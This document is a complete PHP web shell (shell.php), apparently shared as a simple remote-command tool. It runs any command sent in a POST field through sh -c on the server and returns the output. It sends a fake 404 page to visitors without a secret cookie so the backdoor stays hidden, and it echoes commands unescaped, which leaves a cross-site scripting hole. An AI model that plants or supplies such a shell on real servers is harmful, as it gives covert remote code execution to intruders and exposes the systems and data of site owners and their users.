Simple insecure php shell

shell.php

<?php
$access_token = "";
if (empty($_COOKIE["access_token"]) || $_COOKIE["access_token"] !== $access_token) {
    header('HTTP/1.0 404 Not Found');
    echo "<h1>404 Not Found</h1>";
    echo "The page that you have requested could not be found.";
    die();
} else {
    header('Connection: close');
    header('X-Accel-Buffering: no');
    header('Expires: Sat, 26 Jul 1997 05:00:00 GMT');
    header('Cache-Control: no-store, no-cache, must-revalidate');
    header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
    ob_implicit_flush(true);
    ob_end_flush();
}
if (empty($_POST['cwd'])) $_POST['cwd'] = '.';
if (empty($_POST['cmd'])) $_POST['cmd'] = 'pwd';
?>
<form action="" method="post">
    cwd: <input type="text" name="cwd" value="<?php echo htmlspecialchars($_POST['cwd'])?>" size="75"/><br>
    cmd: <input type="text" name="cmd" value="<?php echo htmlspecialchars($_POST['cmd'])?>" size="75"/>
    <input type="submit"/>
</form>
<div style="font: 13px Consolas, monospace; white-space: pre;">
<?php
if (!empty($_POST['cmd'])) {
    echo "$ " . $_POST['cmd'] . "\n";

    $cmd = "sh -c " . escapeshellarg($_POST['cmd']) . " 2>&1";

    $descriptorspec = array(
        0 => array("pipe", "r"),
        1 => array("pipe", "w"),
        2 => array("pipe", "w")
    );

    $process = proc_open($cmd, $descriptorspec, $pipes, realpath($_POST['cwd']));
    if (is_resource($process)) {
        while ($str = fgets($pipes[1])) {
            $str = htmlspecialchars($str);
            $str = preg_replace("/\033\[[\d;]+m/", "", $str);
            echo "<span>$str</span>";
        }
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);
        echo "\n$";
    }
}